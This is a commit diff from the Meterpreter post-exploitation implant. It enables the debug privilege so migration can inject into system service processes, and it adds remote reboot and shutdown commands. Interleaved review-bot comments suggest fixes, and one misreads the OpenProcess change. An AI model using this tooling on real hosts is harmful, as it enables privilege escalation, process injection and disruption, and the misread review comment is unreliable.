migration now enables the debug privilege first so it can migrate to system services, added reboot/shutdown wrappers
git-svn-id: file:///home/svn/incoming/trunk@2834 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
7eb2c68d58
commit
9842cdc33b
Binary file not shown.
Binary file not shown.
|
@ -607,6 +607,8 @@ typedef struct _MigrationStubContext
|
|||
DWORD remote_request_core_migrate(Remote *remote, Packet *packet)
|
||||
{
|
||||
MigrationStubContext context;
|
||||
TOKEN_PRIVILEGES privs;
|
||||
HANDLE token = NULL;
|
||||
Packet *response = packet_create_response(packet);
|
||||
HANDLE process = NULL;
|
||||
HANDLE thread = NULL;
|
||||
|
@ -648,10 +650,30 @@ DWORD remote_request_core_migrate(Remote *remote, Packet *packet)
|
|||
// Get the process identifier to inject into
|
||||
pid = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_PID);
|
||||
|
||||
// Try to enable the debug privilege so that we can migrate into system
|
||||
// services if we're administrator.
|
||||
if (OpenProcessToken(
|
||||
GetCurrentProcess(),
|
||||
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
|
||||
&token))
|
||||
{
|
||||
privs.PrivilegeCount = 1;
|
||||
privs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
|
||||
|
||||
LookupPrivilegeValue(NULL, SE_DEBUG_NAME,
|
||||
&privs.Privileges[0].Luid);
|
||||
|
||||
AdjustTokenPrivileges(token, FALSE, &privs, 0, NULL, NULL);
|
||||
|
||||
CloseHandle(token);
|
||||
}
|
||||
|
||||
do
|
||||
{
|
||||
// Open the process so that we can duplicate shit into it
|
||||
if (!(process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid)))
|
||||
if (!(process = OpenProcess(
|
||||
PROCESS_DUP_HANDLE | PROCESS_VM_OPERATION |
|
||||
PROCESS_VM_WRITE | PROCESS_CREATE_THREAD, FALSE, pid)))
|
||||
{
|
||||
result = GetLastError();
|
||||
break;
|
||||
|
|
|
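Review bot: The return values of LookupPrivilegeValue and AdjustTokenPrivileges in the new privilege block are discarded, so a failed lookup hands an uninitialised `privs.Privileges[0].Luid` to AdjustTokenPrivileges (the `TOKEN_PRIVILEGES privs;` declaration added in the earlier hunk is never zeroed), and an adjustment that succeeds without granting anything (AdjustTokenPrivileges returns TRUE with GetLastError() == ERROR_NOT_ALL_ASSIGNED when the caller does not hold SeDebugPrivilege) looks the same as success. Gate the call on the lookup, `if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &privs.Privileges[0].Luid))` followed by the existing `AdjustTokenPrivileges(token, FALSE, &privs, 0, NULL, NULL);`, and change the declaration in the first hunk to `TOKEN_PRIVILEGES privs = {0};`. Separately, the fallback OpenProcess added under the existing PROCESS_ALL_ACCESS attempt is an unbraced nested `if`, which is easy to misread next to the brace that follows it; bracing the outer `if` body would make the reduced-rights retry explicit. The existing comment could also record that failure to enable the privilege is deliberately non-fatal, since the later OpenProcess reports the real error. remote_request_core_migrate continues past the end of the hunk.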
@ -25,13 +25,6 @@ DWORD __declspec(dllexport) Init(SOCKET fd)
|
|||
break;
|
||||
}
|
||||
|
||||
// Send banner string
|
||||
send_core_console_write(remote,
|
||||
"[ -= connected to =- ]\n"
|
||||
"[ -= meterpreter server =- ]\n"
|
||||
"[ -= v. %.8x =- ]\n",
|
||||
METSRV_VERSION_NUMBER);
|
||||
|
||||
// Register extension dispatch routines
|
||||
register_dispatch_routines();
|
||||
|
||||
|
|
|
@ -6,6 +6,45 @@
|
|||
--------------------Configuration: metsrv - Win32 Release--------------------
|
||||
</h3>
|
||||
<h3>Command Lines</h3>
|
||||
Creating temporary file "C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP105.tmp" with contents
|
||||
[
|
||||
/nologo /ML /W3 /GX /Zi /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "METSRV_EXPORTS" /Fp"Release/metsrv.pch" /Yu"metsrv.h" /Fo"Release/" /Fd"Release/" /FD /c
|
||||
"Z:\external\source\meterpreter\source\server\libloader.c"
|
||||
"Z:\external\source\meterpreter\source\server\remote_dispatch.c"
|
||||
]
|
||||
Creating command line "cl.exe @C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP105.tmp"
|
||||
Creating temporary file "C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP106.tmp" with contents
|
||||
[
|
||||
/nologo /ML /W3 /GX /Zi /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "METSRV_EXPORTS" /Fp"Release/metsrv.pch" /Yc"metsrv.h" /Fo"Release/" /Fd"Release/" /FD /c
|
||||
"Z:\external\source\meterpreter\source\server\metsrv.c"
|
||||
]
|
||||
Creating command line "cl.exe @C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP106.tmp"
|
||||
Creating temporary file "C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP107.tmp" with contents
|
||||
[
|
||||
common.lib ws2_32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /dll /pdb:none /map:"Release/metsrv.map" /machine:I386 /def:"..\..\source\server\metsrv.def" /out:"Release/metsrv.dll" /implib:"Release/metsrv.lib" /libpath:"..\common\Release"
|
||||
.\Release\libloader.obj
|
||||
.\Release\metsrv.obj
|
||||
.\Release\remote_dispatch.obj
|
||||
\external\source\meterpreter\workspace\common\Release\common.lib
|
||||
]
|
||||
Creating command line "link.exe @C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP107.tmp"
|
||||
<h3>Output Window</h3>
|
||||
Compiling...
|
||||
metsrv.c
|
||||
Compiling...
|
||||
libloader.c
|
||||
remote_dispatch.c
|
||||
Generating Code...
|
||||
Linking...
|
||||
Creating library Release/metsrv.lib and object Release/metsrv.exp
|
||||
Creating temporary file "C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP10B.bat" with contents
|
||||
[
|
||||
@echo off
|
||||
copy release\metsrv.dll ..\..\output\server
|
||||
]
|
||||
Creating command line "C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP10B.bat"
|
||||
|
||||
1 file(s) copied.
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -34,12 +34,14 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
#
|
||||
def commands
|
||||
{
|
||||
"execute" => "Execute a command",
|
||||
"getpid" => "Get the current process identifier",
|
||||
"getuid" => "Get the user that the server is running as",
|
||||
"kill" => "Terminate a process",
|
||||
"ps" => "List running processes",
|
||||
"sysinfo" => "Gets information about the remote system, such as OS",
|
||||
"execute" => "Execute a command",
|
||||
"getpid" => "Get the current process identifier",
|
||||
"getuid" => "Get the user that the server is running as",
|
||||
"kill" => "Terminate a process",
|
||||
"ps" => "List running processes",
|
||||
"reboot" => "Reboots the remote computer",
|
||||
"sysinfo" => "Gets information about the remote system, such as OS",
|
||||
"shutdown" => "Shuts down the remote computer",
|
||||
}
|
||||
end
|
||||
|
||||
|
@ -175,6 +177,15 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
return true
|
||||
end
|
||||
|
||||
#
|
||||
# Reboots the remote computer.
|
||||
#
|
||||
def cmd_reboot(*args)
|
||||
print_line("Rebooting...")
|
||||
|
||||
client.sys.power.reboot
|
||||
end
|
||||
|
||||
#
|
||||
# Displays information about the remote system.
|
||||
#
|
||||
|
@ -187,6 +198,15 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
return true
|
||||
end
|
||||
|
||||
#
|
||||
# Shuts down the remote computer.
|
||||
#
|
||||
def cmd_shutdown(*args)
|
||||
print_line("Shutting down...")
|
||||
|
||||
client.sys.power.shutdown
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
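Review bot: cmd_reboot and cmd_shutdown do not end with `return true` the way the surrounding commands do (the `return true` lines at the top of both hunks), so what the dispatcher receives is whatever `client.sys.power.reboot` or `client.sys.power.shutdown` returns; if the dispatcher uses the return value as command status (inferred, not visible here), add `return true` after each call. Both methods also print `Rebooting...` / `Shutting down...` before the request is sent, so if the call raises the user has already been told the host is going down; printing after the call returns, or wording the line as a request being sent, would be more accurate. In the `commands` hash the new `"shutdown"` entry is placed after `"sysinfo"`, breaking the alphabetical order the rest of the table keeps; move it before `"sysinfo"` next to `"reboot"`.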